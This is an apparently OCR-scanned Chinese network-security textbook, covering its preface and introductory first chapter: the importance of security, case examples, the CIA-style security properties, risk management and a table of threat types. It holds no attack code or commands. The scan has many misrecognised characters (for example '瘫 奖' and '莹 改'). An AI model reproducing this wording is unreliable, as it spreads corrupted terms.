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在 全 球 信息 化 的 背景 下 ,信息 已 成 为 一 种 重要 的 战略 资源 。 信 息 的 应 用 涵 
盖 国 防 、 政 治 \ 经 济 、 科 技 、 文 化 等 各 个 领域 ,在 社会 生产 和 生活 中 的 作用 越 来 越 
显著 。 随 着 Internet 在 全 球 的 普及 和 发 展 ,计算 机 网 络 成 为 信息 的 主要 传播 媒 
介 。 网 络 信 息 技 术 的 应 用 更 加 普及 和 广泛 ,应 用 层次 逐步 深入 ,应 用 范围 不 
断 扩 大 。 国 家 发 展 和 社会 运转 、 计 算 机 网 络 的 全 球 互联 ,都 显现 出 人 类 活动 
对 计算 机 网 络 的 依赖 性 不 断 增 强 , 这 也 使 网 络 安全 问题 更 加 突出 ,并 受到 越 
来 越 广泛 的 关注 。 计 算 机 网 络 的 安全 性 已 经 成 为 当今 信息 化 建设 的 核心 问 
题 之 一 。 

本 书 针对 计算 机 网 络 安全 技术 进行 全 面 系统 的 介绍 。 随 着 网 络 技术 的 快 
速 发 展 ,网 络 安全 技术 也 不 断 地 丰富 和 完善 。 本 书 尽 可 能 涵盖 计算 机 网 络 安全 
技术 的 主要 内 容 , 特 别 是 围绕 职业 教育 的 特点 和 培训 目标 ,在 不 依靠 太 多 网 络 
硬件 设备 的 前 提 下 ,使 读者 能 够 循序 渐进 地 了 解 网 络 安全 的 关键 技术 与 方法 ， 
提高 安全 防护 意识 并 应 用 于 实际 工作 场景 。 

本 书 的 主要 特点 如 下 。 

(1) 本 书 紧 紧 围 绕 “ 攻 ”和 * 防 ”两 个 不 同 角度 ,讲解 网 络 安 全 技术 中 的 黑客 
攻击 的 主要 手段 和 相应 的 防范 方法 。 

(2) 通过 案例 介绍 ,读者 可 以 轻松 掌握 各 个 知识 点 ,在 不 知 不 觉 中 快速 提 
升 实践 技能 。 以 任务 为 驱动 ,实例 为 主 ,模拟 真实 工作 环境 ,解决 各 种 网 络 
问题 。 

(3) 每 章 开始 都 列 出 学 习 的 知识 点 , 既 介绍 基本 概念 ,背景 知识 ,也 对 实战 
技术 进行 深入 浅 出 的 介绍 。 除 第 8 章 外 各 章 都 有 课外 练习 ,帮助 读者 复习 本 章 
的 主要 内 容 , 掌 握 基本 概念 和 基本 原理 。 

对 于 书 中 提 到 的 一 些 工具 软件 ,读者 可 以 在 Internet 上 自行 下 载 。 需 要 提 
醒 大 家 的 是 :根据 国家 有 关 法 律 规定 ,任何 利用 黑客 技术 攻击 他 人 的 行为 都 属 
于 违法 行为 。 本 书 的 实践 环境 可 参考 第 2 章 的 内 容 , 在 自己 组 建 的 虚拟 机 下 运 
行 。 本 书 提供 相关 配套 的 PPT 等 教学 资源 。 

由 于 网 络 安全 的 内 容 非常 丰富 .本 书 以 “必需 , 够 用 ”为 度 , 加 强 实践 性 环节 
教学 .提高 读者 实际 技能 的 原则 编写 本 书 。 全 书 注重 知识 性 、 系 统 性 、 条 理性 、 
连贯 性 。 力 求 激发 读者 的 兴趣 ,注重 提示 各 知识 点 之 间 的 内 在 联系 ,精心 组 织 
内 容 , 做 到 由 浅 入 深 、 由 易 到 难 、 删 繁 就 简 、 突 出 重点 。 
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本 章 介绍 网 络 安全 的 重要 性 、 网 络 安全 的 基本 概念 .网络 安 全 风险 及 网 络 安全 的 防护 体 
系 ; 同时 ,对 网 络 安全 的 法 律 法 规 、 信 息 安全 等 级 保护 等 技术 标准 作 简 要 的 介绍 。 


多 > 知识 点 


(1) 网 络 安全 的 概念 特征 。 

(2) 网 络 安全 的 威胁 和 风险 。 

(3) 网 络 安全 所 涉及 的 知识 领域 。 
(4) 网 络 安全 常见 的 防护 技术 。 


局 司 教 学 B 标 


(1) 掌握 网 络 安全 的 概念 、 特 征 、 目 标 及 内 容 。 

(2) 了 解 网 络 面临 的 威胁 及 其 因素 分 析 。 

(3) 掌握 网 络 安全 模型 网 络 安全 体系 和 常用 网 络 安全 技术 。 
(4) 了 解 实体 安全 技术 的 概念 、 内 容 、 措 施 和 隔离 技术 。 
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EEE 网 络 安全 简介 


> 1.1.1 网 络 安全 的 重要 性 


在 现代 信息 化 社会 中 ,计算 机 网 络 技术 得 到 了 快速 的 发 展 和 广泛 应 用 ,给 人 们 的 工作 、 
文化 和 生活 带 来 了 极 大 的 便利 ,同时 网 络 安全 问题 不 断 显 现 。 资 源 共 享 和 计算 机 网 络 安全 
成 为 一 对 日 益 突 出 的 矛盾 体 存 在 着 , 随 着 资源 共享 的 进一步 加 强 ,网 络 安全 已 经 成 为 世界 关 
注 的 热点 问题 之 一 ,其 重要 性 更 加 突出 ,不 仅 关 系 到 国家 安全 和 社会 稳定 ,也 涉及 信息 化 建 
设 的 顺利 发 展 及 用 户 资产 和 信息 资源 的 安全 ,并 成 为 热门 研究 和 人 才 需 求 的 新 领域 。 

【案例 1-1】 2014 年 ,我 国 中 央 网 络 安全 和 信息 化 领导 小 组 宣告 成 立 , 在 北京 召开 了 第 
一 次 会 议 。 中 共 中 央 总 书记 、 国 家 主席 .中 央 军 委 主席 习近平 亲自 担任 组 长 ,李克强 、 刘 云 山 
任 副 组 长 。 习 近 平 在 讲话 中 指出 : 网 络 安全 和 信息 化 是 事 关 国家 安全 和 国家 发 展 , 事 关 广 
大 人 民 群 众 工作 生活 的 重大 战略 问题 ,要 从 国际 国内 大 势 出 发 ,总 体 布局 、 统 筹 各 方 、 创 新 发 
展 , 努 力 把 我 国 建设 成 为 网 络 强国 。 

截至 2016 年 6 月 ,我 国 网 民 人 数 达 到 7. 10 亿 , 半 年 共计 新 增 网 民 2 132 万 人 ,半年 增长 
率 为 3.1%, 较 2015 年 下 半年 增长 率 有 所 提升 。 互 联网 普及 率 为 51.7% , 较 2015 年 年 底 提 
升 1.3%% ,如 图 1-1 所 示 。 
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图 1-1 2016 年 中 国 网 民 规 模 和 互联 网 普及 率 统计 


互联 网 在 我 国政 治 、 经 济 \ 文 化 以 及 社会 生活 中 发 挥 着 越 来 越 重 要 的 作用 ,互联 网 的 影 
响 日 益 扩 大 、 地 位 日 益 提 升 ,维护 网 络 安全 工作 的 重要 性 日 益 突 出 。 

【案例 1-2〗 中 国 网 络 遭 攻击 “ 瘫 疾 ”, 涉 事 IP 地 址 指向 美国 公司 。 据 (环球 时 报 》2014 年 
1 月 报道 ,中 国 互 联网 部 分 用 户 21 日 遭遇 大 范围 极为 严重 的 “ 竣 疾 ”性 攻击 ,国内 通用 顶级 根 
域名 服务 器 解析 出 现 异 常 ,部 分 国内 用 户 无 法 访问 .cn 或 .com 等 域名 网 站 。 全 国 约 有 2/3 
的 网 站 和 几 十 亿 企 事业 机 构 或 个 人 用 户 访问 受到 极 大 影响 , 绝 大 多 数 网 站 无 法 打开 浏览 , 导 
致 系统 处 于 竣 首 状态 。 网 络 系统 故障 发 生 后 ,一 些 用 户 访问 时 都 会 被 跳 转 到 一 个 位 于 美国 
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的 Dynamic Internet Technology 公司 , 曾 是 “自由 门 ? 翻 墙 软件 的 开发 者 的 IP 地 址 。 

网 络 系统 失灵 会 造成 通信 瘫 奖 、 基 础 设施 损坏 、 大 范围 停电 等 重大 事故 。 信 息 安 全 空间 
将 成 为 传统 的 国界 、 领 海 、 领 空 的 三 大 国防 和 基于 太空 的 第 四 国防 之 外 的 第 五 国防 , 称 为 
Cyber-Space。 美 国政 府 在 2009 年 5 月 发 表 的 (网络 空间 政策 评估 报告 ), 将 网 络 空间 定义 为 
“全 球 相互 连接 的 数字 信息 和 通信 基础 设施 ”。 

【案例 1-3】 美国 网 络 间 谍 活 动 公 之 于 世 。2013 年 6 月 曾经 参加 美国 安全 局 网 络 监 控 
项 目的 斯 诺 登 披露 “棱镜 事件 "曝光 ,在 香港 公开 爆料 美国 多 次 秘密 利用 超级 软件 监控 包括 
其 盟友 在 内 \ 政 要 在 内 的 网 络 用 户 和 电话 记录 ,包括 谷歌 雅虎、 微软 、 革 果 、Facebook、 美 国 
在 线 .PalTalk、Skype、YouTube 九 大 公司 帮助 提供 漏洞 参数 开放 服务 器 等 ,使 其 轻而易举 
地 监控 有 关 国 家 机 构 或 上 百 万 网 民 的 邮件 .即时 通话 及 相关 数据 。 据 称 , 思 科 参 与 了 中 国 几 
乎 所 有 大 型 网 络 项 目 建设 ,涉及 政府 、. 军 警 、 人 金融 海关 、 民航、 医疗 等 要 害 部 门 。 

因此 ,网 络 安全 不 仅 成 为 商家 关注 的 焦点 ,还 是 技术 研究 的 热门 领域 ,同时 也 是 国家 和 
政府 关注 的 焦点 。 

各 种 计算 机 病毒 和 网 上 黑客 对 Internet 的 攻击 越 来 越 猛烈 ,网 站 遭受 破坏 的 事例 不 胜 
枚 举 。 而 网 络 本 身 有 其 脆弱 的 原因 ,主要 如 下 。 

(1) 开放 的 网 络 环境 。 正 如 一 句 经 典 的 网 络 用 语 所 说 :“Internet 的 美妙 之 处 在 于 你 和 
每 个 人 都 能 互联 ,而 Internet 的 可 怕 之 处 在 于 每 个 人 都 能 和 你 互联 .” 网 络 空间 之 所 以 易 受 
攻击 ,是 因为 网 络 系统 具有 开放 性 的 特点 。 网 络 用 户 可 以 自由 访问 网 站 ,几乎 不 受 时 间 和 空 
间 的 限制 。 网 络 病毒 等 有 害 信 息 可 以 在 网 上 迅速 扩散 。 网 络 基 础 设施 和 终端 设备 数量 众 
多 ,各 种 信息 系统 互联 互通 ,用 户 身份 和 位 置 真 假 难 辨 ,构成 了 一 个 复杂 的 网 络 环境 。 此 外 ， 
网 络 建立 初期 考虑 便利 性 和 开放 性 ,并 没有 为 总 体 安全 考虑 ,因此 任何 一 个 人 、 团 体 都 可 以 
接 人 ,网 络 所 面临 的 破坏 和 攻击 可 能 是 多 方面 的 。 可 能 来 自 资源 子 网 ,也 可 能 是 通信 子 网 。 

(2) 网 络 协议 的 漏洞 。 网 络 数据 交互 离 不 开通 信 协 议 ,而 这 些 协 议 本 身 就 有 不 同 层次 、 
不 同方 面 的 漏洞 ,针对 TCP/IP 等 协议 的 攻击 非常 多 。 如 通过 网 络 服务 攻击 、IP 欺骗 .ARP 
欺骗 、 嗅 探 软件 等 。 

(3) 操作 系统 的 原因 。 网 络 操作 系统 的 缺陷 影响 了 操作 系统 的 安全 性 。 操 作 系统 的 缺 
陷 一 般 有 三 类 。 一 是 系统 模型 本 身 的 缺陷 。 这 是 系统 设计 初期 就 存在 的 ,无 法 通过 修改 操 
作 系 统 的 源 代 码 来 弥补 。 二 是 操作 系统 的 Bug。 任 何 程序 都 会 有 漏洞 ,操作 系统 也 不 例外 。 
三 是 操作 系统 的 配置 不 正确 。 有 些 用 户 只 会 使 用 操作 系统 的 默认 配置 ,这 一 点 是 远 远 不 
够 的 。 

(4) 人 为 因素 。 许 多 公司 和 用 户 的 网 络 安全 意识 薄弱 ,造成 了 很 多 网 络 管理 上 的 安全 
缺陷 。 


PP 1.1.2 网 络 安全 的 定义 


由 1. 信息 安全 及 网 络 安全 的 概念 
国际 标准 化 组 织 (ISO) 提 出 信息 安全 (Information Security) 的 定义 是 : 为 数据 处 理 系 
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统 建 立 和 采取 的 技术 及 管理 保护 ,保护 计算 机 硬件 .软件 .数据 不 因 偶然 及 恶意 的 原因 而 遭 
到 破坏 、 更 改 和 泄露 。 

我 国 (计算 机 信息 系统 安全 保护 条 例 ) 定 义 的 信息 安全 是 : 计算 机 信息 系统 的 安全 保 
护 , 应 当 保障 计算 机 及 其 相关 的 配套 设备 .设施 ( 含 网 络 ) 的 安全 ,运行 环境 的 安全 ,保障 信息 
的 安全 ,保障 计算 机 功能 的 正常 发 挥 ,以 维护 计算 机 信息 系统 安全 运行 。 主 要 防止 信息 被 非 
授权 泄露 .更改 破坏 或 使 信息 被 非法 的 系统 辨识 与 控制 ,确保 信息 的 机 密 性 、 完 整 性 .可 用 
性 、 可 控 性 和 可 审查 性 ( 称 为 信息 安全 属性 特征 ) 。 

信息 安全 的 发 展 经 历 了 通信 保密 、 信 息 安全 (以 保密 性 、 完 整 性 和 可 用 性 为 目标 ) 和 信息 
保障 3 个 阶段 。 信 息 安全 的 内 涵 也 在 不 断 地 延伸 和 变化 ,从 最 初 的 信息 保密 性 发 展 到 信息 
的 完整 性 、 可 用 性 、 可 控 性 和 可 审查 性 ,进而 又 发 展 为 “ 攻 ( 攻 击 )、 防 (防范 )\ 测 (检测 )、 控 ( 控 
制 )、 管 (管理 ) 、 评 (评估 )” 等 多 方面 的 基础 理论 和 实施 技术 。 

计算 机 网 络 安全 (Computer Network Security) 简 称 网 络 安全 ,是 指 利 用 计算 机 网 络 管 
理 控 制 和 技术 措施 ,保证 网 络 系统 及 数据 的 保密 性 、 完 整 性 、 网 络 服务 可 用 性 和 可 审查 性 
受到 保护 。 即 保证 网 络 系 统 的 硬件 ,软件 及 系统 中 的 数据 资源 得 到 完整 准确、 连续 运行 
与 服务 不 受 干扰 破坏 和 非 授权 人 使用。 狭义 上 ,网 络 安 全 是 指 计算 机 及 其 网 络 系统 资源 和 
信息 资源 不 受 有 害 因素 的 威胁 和 危害。 广义 上 ,凡是 涉及 计算 机 网 络 信 息 安全 属性 特征 
的 相关 技术 和 理论 ,都 是 网 络 安全 的 研究 领域 。 实 际 上 ,网 络 安 全 问题 包括 两 方面 的 内 
容 : 四 网 络 的 系统 安全 ; 加 网 络 的 信息 安全 。 网 络 安全 的 最 终 目 标 是 保护 网 络 的 信息 
安全 。 





上 2 网 络 安全 的 特征 及 目标 


网 络 安全 定义 中 的 保密 性 ,完整 性 、 可 用 性 、 可 控 性 、 可 审查 性 ,反映 了 网 络 信息 安全 的 
基本 特征 和 要 求 。 反 映 了 网 络 安全 的 基本 属性 、 要 素 与 技术 方面 的 重要 特征 。 

(1) 保密 性 。 保 密 性 也 称 机 密 性 ,是 指 网 络 信息 按 规定 要 求 不 泄露 给 非 授 权 用 户 、 实 体 
或 过 程 , 即 保护 有 用 信息 不 泄露 给 非 授 权 个 人 或 实体 ,强调 有 用 信息 只 被 授权 对 象 使 用 的 
特征 。 

(2) 完整 性 。 完 整 性 是 指 网 络 数 据 在 传输 、 交 换 、 存 储 和 处 理 过 程 保持 非 修改 , 非 破 
坏 和 非 丢 失 的 特性 , 即 保持 信息 原样 性 ,使 信息 能 正确 生成 存储、 传输 ,是 最 基本 的 安全 
特征 。 

(3) 可 用 性 。 可 用 性 是 指 网 络 信息 可 被 授权 实体 正常 使 用 或 在 非 正常 情况 下 能 应 急 恢 
复 使 用 的 特征 ,是 衡量 网 络 信息 系统 面向 用 户 的 一 种 安全 性 能 。 

(4) 可 控 性 。 可 控 性 是 指 在 网 络 系统 中 的 信息 传播 及 具体 内 容 能 够 实现 有 效 控制 的 特 
性 , 即 网 络 系统 中 的 任何 信息 要 在 一 定 传输 范围 和 存放 空间 内 可 控 。 

(5) 可 审查 性 。 可 审查 性 又 称 不 可 否认 性 ,是 指 网 络 通信 双方 在 信息 交互 过 程 中 ,确信 
参与 者 本 身 , 以 及 参与 者 所 提供 的 信息 的 真实 统一 性 , 即 所 有 参与 者 都 不 可 能 否认 或 抵赖 本 
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人 的 真实 身份 ,以 及 提供 信息 的 原样 性 和 完成 的 操作 与 承诺 。 


网 络 安全 研究 的 目标 : 在 信息 输入 传输、 存储、 处 理 和 输出 的 整个 过 程 中 ,提供 物理 和 
让 辑 上 的 防护 、 监 控 \ 反 应 恢复 和 对 抗 能 力 , 以 保护 网 络 信息 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 
性 和 可 审查 性 。 网 络 安全 的 最 终 目标 是 保障 网 络 上 的 信息 安全 。 


1a. 网 络 安全 涉及 的 主要 内 容 


可 以 从 不 同 角度 划分 网 络 安全 研究 的 主要 内 容 。 

从 层次 结构 上 ,也 可 将 网 络 安全 所 涉及 的 内 容 概括 为 以 下 五 个 方面 。 

(1) 实体 安全 (Physical Security)。 实 体 安全 也 称 物理 安全 , 指 保护 计算 机 网 络 设备 \ 设 
施 及 其 他 媒介 免 草 地震, 水 灾 、 火 灾 、 有 害 气体 、 盗 穿 和 其 他 环境 事故 破坏 的 措施 及 过 程 。 包 
括 环境 安全 ,设备 安全 和 媒体 安全 三 个 方面 。 实 体 安全 是 信息 系统 安全 的 基础 。 

(2) 运行 安全 (Operation Security)。 运 行 安全 包括 网 络 运 行 和 访问 控制 安全 ,如 设置 
防火 墙 实 现 内 外 网 隔离 .备份 系统 实现 系统 的 恢复 。 具 体 包 括 内 外 网 的 隔离 机 制 \ 应 急 处 
置 机 制 和 配套 服务 、 网 络 系统 安全 性 监测 、 网 络 安全 产品 运行 监测 .定期 检查 和 评估 、 系 统 
升级 和 补丁 处 理 、 跟 踪 安 全 漏洞 .灾难 恢复 机 制 与 预防 ,安全 审计 、 系 统 改造 、 网 络 安全 次 
询 等 。 

(3) 系统 安全 (System Security)。 系 统 安全 主要 包括 操作 系统 安全 ,数据 库 系 统 安全 和 
网 络 系统 安全 ,以 网 络 系统 的 特点 、 实 际 条 件 和 管理 要 求 为 依据 ,通过 针对 性 地 为 系统 提供 
安全 策略 机 制 ,保障 措施 ,应急 修复 方法 ,安全 建议 和 安全 管理 规范 等 ,确保 整个 网 络 系统 安 
全 运行 。 

(4) 应 用 安全 (Application Security)。 应 用 安全 由 应 用 软件 开发 平台 的 安全 和 应 用 系 
统 的 数据 安全 两 部 分 组 成 。 具 体 包括 业务 应 用 软件 的 安全 性 测试 分 析 、 业 务 数据 的 安全 检 
测 与 审计 数据 资源 访问 控制 验证 测试 .实体 身份 鉴别 检测 、 业 务 现场 的 备份 与 恢复 机 制 检 
查 .数据 唯一 性 /一 致 性 / 防 冲突 检测 ,数据 的 保密 性 测试 、 系 统 的 可 靠 性 测试 和 系统 的 可 用 
性 测试 等 。 

(5) 管理 安全 (Management Security)。 管 理 安全 也 称 安全 管理 ,主要 指 对 人 员 及 网 络 
系统 安全 管理 的 各 种 法 律 法规. 政策 .策略 ,规范 \ 标 准 、 技 术 手 段 . 机 制 和 措施 等 。 管理 内 
容 主 要 有 法 律 法 规 、 政 策 策略 ,规范 标 准 、 相 关 人 员 应 用 系统 使 用 .软件 及 设备 .文档 数据 、 
操作 、 运 营 、 机 房 . 安 全 培训 等 。 





上 4 网 络 安 全 内 容 的 相互 关系 


网 络 安全 所 涉及 的 主要 相关 内 容 及 其 关系 如 图 1-2 所 示 。 在 网 络 信息 安全 法 律 法 规 的 
基础 上 ,以 安全 管理 为 保障 ,以 实体 和 运行 安全 为 基础 ,以 系统 安全 .运行 安全 和 应 用 安全 确保 
网 络 正常 运行 与 服务 。 网 络 安全 与 信息 安全 的 相关 内 容 及 其 关系 如 图 1-3 所 示 。 
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信息 安全 法 律 法 规 密码 理论 数据 加 密 、 数字 签名 、 消 息 摘要 、 窗 钥 管 理 
图 1-2 网 络 安全 的 主要 内 容 及 其 关系 图 1-3 网络 安 全 与 信息 安全 的 相关 内 容 及 其 关系 


PP 1.1.3 网 络 安全 的 基本 要 素 


“ 进 不 来 “ 拿 不 走 “ 看 不 懂 ”“ 改 不 了 ”“ 走 不 脱 " 是 网 络 信息 安 全 建设 的 目的 。 如 “看 不 
懂 ” 是 指数 据 加 密 。 网 络 安全 的 目的 是 保障 网 络 中 的 信息 安全 ,防止 非 授权 用 户 的 进入 以 及 
事后 的 安全 审计 。 这 也 就 是 网 络 安全 的 5 个 基本 要 素 , 即 保密 性 (Confidentiality) ,完整 性 
(CIntegrity)、 可 用 性 (Availability) 、 可 控 性 (Controllability) 和 不 可 抵赖 性 (Non-Repudiation) 。 


1. 保密 性 


保密 性 是 指 确 保 信 息 不 暴露 给 非 授 权 的 实体 或 进程 。 即 信息 的 内 容 不 会 被 未 授权 的 第 
三 方 所 知 。 通 常 通过 访问 控制 阻止 非 授 权 用 户 获 得 机 密 信息 ,还 通过 加 密 阻止 非 授权 用 户 
获知 信息 内 容 。 


1 有 2. 完整 性 
信息 不 被 偶然 或 蓄意 地 删除 ,修改 ,伪造 、 乱 序 、 重 放 、 择 入 等 破坏 的 特性 。 只 有 得 到 允许 


的 人 才能 修改 实体 或 进程 ,并 且 能 够 判别 出 实体 或 进程 是 否 已 被 自 改 。 即 信息 的 内 容 不 能 为 
未 授权 的 第 三 方 修改 。 信 息 在 存储 或 传输 时 不 被 修改 、 破 坏 , 不 出 现 信息 包 的 丢失 、 乱 序 等 。 


EE. 可 用 性 


得 到 授权 的 实体 在 需要 时 可 访问 资源 和 服务 。 可 用 性 是 指 无 论 何 时 ,只 要 用 户 需 要 , 信 
息 系统 必须 是 可 用 的 ,也 就 是 说 信息 系统 不 能 拒绝 服务 。 网 络 最 基本 的 功能 是 向 用 户 提供 
所 需 的 信息 和 通信 服务 ,而 用 户 的 通信 要 求 是 随机 的 、 多 方面 的 (音频 数据 、 文 字 和 图 像 
等 ), 有 时 还 要 求 时 效 性 。 网 络 必须 随时 满足 用 户 通信 的 要 求 。 攻 击 者 通常 采用 占用 资源 的 
手段 阻碍 授权 者 的 工作 。 可 以 使 用 访问 控制 机 制 , 阻 止 非 授 权 用 户 进入 网 络 ,从 而 保证 网 络 系 
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1 mss DI 











统 的 可 用 性 。 增 强 可 用 性 还 包括 如 何 有 效 地 避免 因 各 种 灾害 (战争 、 地 震 等 ) 造 成 的 系统 失效 。 


14. 可 控 性 


可 控 性 主要 是 指 对 危害 国家 信息 (包括 利用 加 密 的 非法 通信 活动 ) 的 监视 审计 ,控制 授 
权 范 围 内 的 信息 的 流向 及 行为 方式 。 使 用 授权 机 制 ,控制 信息 传播 的 范围 ,内容 ,必要 时 能 
恢复 密 钥 ,实现 对 网 络 资源 及 信息 的 可 控 性 。 


Ls. 不 可 抵赖 性 


不 可 抵赖 性 也 称 作 不 可 否认 性 。 不 可 抵赖 性 是 面向 通信 双方 (人 、 实 体 或 进程 ) 信 息 真 
实 统一 的 安全 要 求 , 它 包括 收 、 发 双方 均 不 可 抵赖 。 一 是 源 发 证 明 , 它 提供 给 信息 接收 者 以 
证 据 , 这 将 使 发 送 者 谎 称 未 发 送 过 这 些 信息 或 者 否认 它 的 内 容 的 企图 不 能 得 逮 ; 二 是 交付 
证 明 , 它 提供 给 信息 发 送 者 以 证 明 这 将 使 接收 者 谎 称 未 接收 过 这 些 信息 或 者 否认 它 的 内 容 
的 企图 不 能 得 偿 。 一 般 通 过 数字 签名 等 技术 来 实现 。 

















1.2 网 络 安全 风险 分 析 





1. 网 络 信息 资产 确定 


网 络 信 息 资产 大 致 分 为 物理 资产 、 知 识 资 产 \ 时 间 资 产 和 名 誉 资产 四 类 。 

(1) 物理 资产 。 具 有 物理 形态 的 资产 ,例如 ,服务 器 、 网 络 连接 设备 工作 站 等 。 

(2) 知识 资产 。 其 可 以 为 任意 的 形式 存在 ,例如 ,一 些 系统 软件 ,数据 库 或 组 织 内 部 的 
电子 邮件 等 。 

(3) 时 间 资 产 。 对 于 组 织 与 企业 来 说 ,时 间 也 属于 一 种 宝贵 的 财产 。 

(4) 名 誉 资产 。 公 众 对 于 一 个 企业 的 看 法 与 意见 也 可 以 直接 影响 其 业绩 ,所 以 名 誉 也 
属于 一 种 重要 的 资产 ,需要 被 保护 。 


12. 信息 安全 评估 


对 资产 进行 标识 后 ,下 一 步 就 是 对 这 些 资产 面临 的 威胁 进行 标识 ,首先 有 以 下 关键 词 便 
于 理解 这 些 风险 。 
(1) 安全 漏洞 。 安 全 漏洞 即 存在 于 系统 之 中 ,可 以 
用 于 越过 系统 的 安全 防护 。 安全 漏洞 安全 威胁 
(2) 安全 威胁 。 安 全 威胁 即 一 系统 可 能 被 利用 的 
漏洞 。 
(3) 安全 风险 。 当 漏洞 与 安全 威胁 同时 存在 时 就 会 
存在 安全 风险 。 图 1-4 安全 风险 ,安全 漏洞 ,安全 
三 者 之 间 的 关系 如 图 1-4 所 示 。 威胁 之 间 的 关系 
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1a. 风险 管理 


在 确定 了 资产 与 资产 面临 的 威胁 后 ,应 该 对 这 些 资产 进行 风险 管理 。 具 体 来 说 ,风险 管 
理 分 为 以 下 4 个 部 分 。 

(1) 风险 规避 。 此 方法 为 最 简单 的 风险 管理 方法 , 当 资 产 收益 远大 于 操作 该 方法 所 损 
失 的 收益 时 可 使 用 。 例 如 ,一 个 系统 可 能 把 员工 与 外 界 进行 邮件 交换 视 为 一 个 不 可 接受 的 
安全 威胁 ,因为 管理 员 认 为 这 样 可 能 会 把 系统 内 的 秘密 信息 发 布 到 外 部 环境 中 ,所 以 系统 就 
直接 禁用 邮件 服务 。 

(2) 风险 最 小 化 。 对 于 系统 来 说 ,风险 影响 最 小 化 是 最 为 常见 的 风险 管理 方法 ,该 方法 
的 具体 做 法 是 管理 员 进 行 一 些 预防 措施 来 降低 资产 面临 的 风险 ,例如 ,对 于 黑客 攻击 Web 
服务 器 的 威胁 ,管理 员 可 以 在 黑客 与 服务 器 主机 之 间 建 立 防 火 墙 来 降低 攻击 发 生 的 概率 。 

(3) 风险 承担 。 管 理 员 可 能 选择 承担 一 些 特定 的 风险 ,并 将 其 造成 的 损失 当 作 运营 成 
本 ,这 一 方法 称 为 风险 承担 。 这 种 情况 往往 出 现在 危险 发 生 的 概率 是 极其 低 的 或 者 是 不 可 
避免 的 (如 硬盘 工作 磨损 ) 情 况 下 , 当 管 理 员 选择 了 这 一 风险 进行 风险 承担 时 ,就 会 将 其 视 为 
无 风险 。 

(4) 风险 转移 。 最 为 常见 的 生活 中 的 例子 就 是 保险 , 当 一 个 人 对 自己 身体 健康 状态 担 
忧 时 ,为 了 对 抗 生 病 的 风险 ,可 以 投保 ,把 风险 转移 到 保险 公司 。 同 样 的 道理 可 以 用 在 系统 
维护 上 面 。 

在 现实 世界 中 ,以 上 4 种 方法 都 不 是 独立 使 用 的 ,一 般 来 说 ,企业 或 组 织 都 可 以 对 4 种 
方法 进行 综合 使 用 。 


| 1.3 网络 安 全 防护 概述 | 网 络 安全 防护 概述 


PP 1.3.1 网 络 安全 的 威胁 


掌握 网 络 安全 威胁 的 现状 及 途径 ,有 利于 更 好 地 掌握 网 络 安全 的 重要 性 、 必 要 性 和 重要 
的 现实 意义 ,有 助 于 深入 讨论 和 强化 网 络 安全 。 

【案例 1-4】 我 国 网 络 遭 受 攻击 近况 。 根 据 国家 互联 网 应 急 中 心 CNCERT 抽样 监测 结 
果 和 国家 信息 安全 漏洞 共享 平台 CNVD 发 布 的 数据 ,2015 年 6 月 22 日 至 28 日 一 周 境内 被 
莹 改 网 站 数量 为 4 386 个 ,其 中 政府 网 站 数量 132 个 ; 境内 被 植 入 后 门 的 网 站 的 数量 为 
1 615 个 ; 针对 境内 网 站 的 仿冒 页 面 数量 为 3 881 个 。 针 对 境内 网 站 的 仿冒 页 面 涉及 域名 
259 个 。 本 周 境内 感染 网 络 病毒 的 主机 数量 约 为 92.9 万 个 。 新 增 信息 安全 漏洞 143 个 ,其 
中 高 危 漏 洞 39 个。 其 中 大 部 分 的 攻击 来 自 国外 。 

目前 , 随 着 信息 技术 的 快速 发 展 和 广泛 应 用 ,国内 外 网 络 被 攻击 或 病毒 侵扰 等 威胁 的 状 
况 , 呈 现 出 上 升 的 态势 ,威胁 的 类 型 及 途径 变化 多 端 。 一 些 网 络 系统 及 操作 系统 和 数据 库 系 
统 、 网 络 资源 和 应 用 服务 都 成 为 黑客 攻击 的 主要 目标 。 目 前 ,网 络 的 主要 应 用 包括 : 电子 商 
务 、 网 上 银行 .股票 证 券 、 网 游 、 下 载 软件 或 流 媒体 等 ,这 些 都 存在 大 量 安全 隐患 。 网 络 安 全 
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威胁 的 主要 途径 如 图 1-5 所 示 。 
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下 等 浏览 器 ||QQ.MSN 等 || 各 种 下 载 软件 || 漏洞 隐患 | | 各 种 风险 | | 邮件 、 网 银 、 网 游 等 


图 1-5 网 络 安全 威胁 的 主要 途径 


鉴于 计算 机 网 络 安全 面临 的 主要 威胁 类 型 及 情况 比较 复杂 ,简便 概括 成 一 个 表格 形式 


进行 描述 ,如 表 1-1 所 示 。 


表 1-1 各 种 类 型 网 络 安全 的 主要 威胁 




































































威胁 类 型 情况 描述 
网 络 窃听 网 络 传输 信息 被 窃听 
窃取 资源 盗 取 系统 重要 的 软件 或 硬件 .信息 和 资料 等 资源 
论 传 信息 攻击 者 获得 某 些 信息 后 ,发 送 给 他 人 
伪造 信息 攻击 者 将 伪造 的 信息 发 送 给 他 人 
算 改 发 送 攻击 者 对 合法 用 户 之 间 的 通信 信息 自 改 后 ,发 送 给 他 人 
非 授权 访问 通过 口令 .密码 和 系统 漏洞 等 手段 获取 系统 访问 权 
截获 /修改 网 络 系统 传输 中 数据 被 截获 删除、 修改 替换 或 破坏 
拒绝 服务 攻击 以 某 种 方式 使 系统 响应 减 慢 甚至 瘫痪 ,使 网 络 难以 正常 服务 
行为 抵赖 通信 实体 否认 已 经 发 生 的 行为 
旁 路 控制 攻击 者 发 掘 系统 的 缺陷 或 安全 脆弱 性 
截获 信息 从 有 关 设 备 发 出 的 无 线 射频 或 其 他 电磁 辐射 中 提取 信息 
人 为 朴 忽 已 授权 人 为 了 利益 或 由 于 粗心 将 信息 泄露 给 未 授权 人 
信息 泄露 信息 被 泄露 或 暴露 给 非 授权 用 户 
物理 破坏 破坏 计算 机 及 其 网 络 系统 软 硬 件 ,或 绕 过 物理 控制 非法 访问 
病毒 木马 利用 计算 机 病毒 或 木马 等 恶意 软件 破坏 或 恶意 控制 他 人 系统 
服务 欺骗 欺骗 合法 用 户 或 系统 ,骗取 他 人 信任 以 便 谋取 私利 
设置 陷阱 设置 陷阱 机关” 系统 或 部 件 ,骗取 特定 数据 以 违反 安全 策略 
资源 耗 尽 故意 超 负荷 使 用 某 一 资源 ,导致 其 他 用 户 服务 中 断 
消息 重 发 重 发 某 次 截获 的 备份 合法 数据 ,达到 信任 非法 侵权 目的 
冒名 顶替 假冒 他 人 或 系统 用 户 进行 活动 
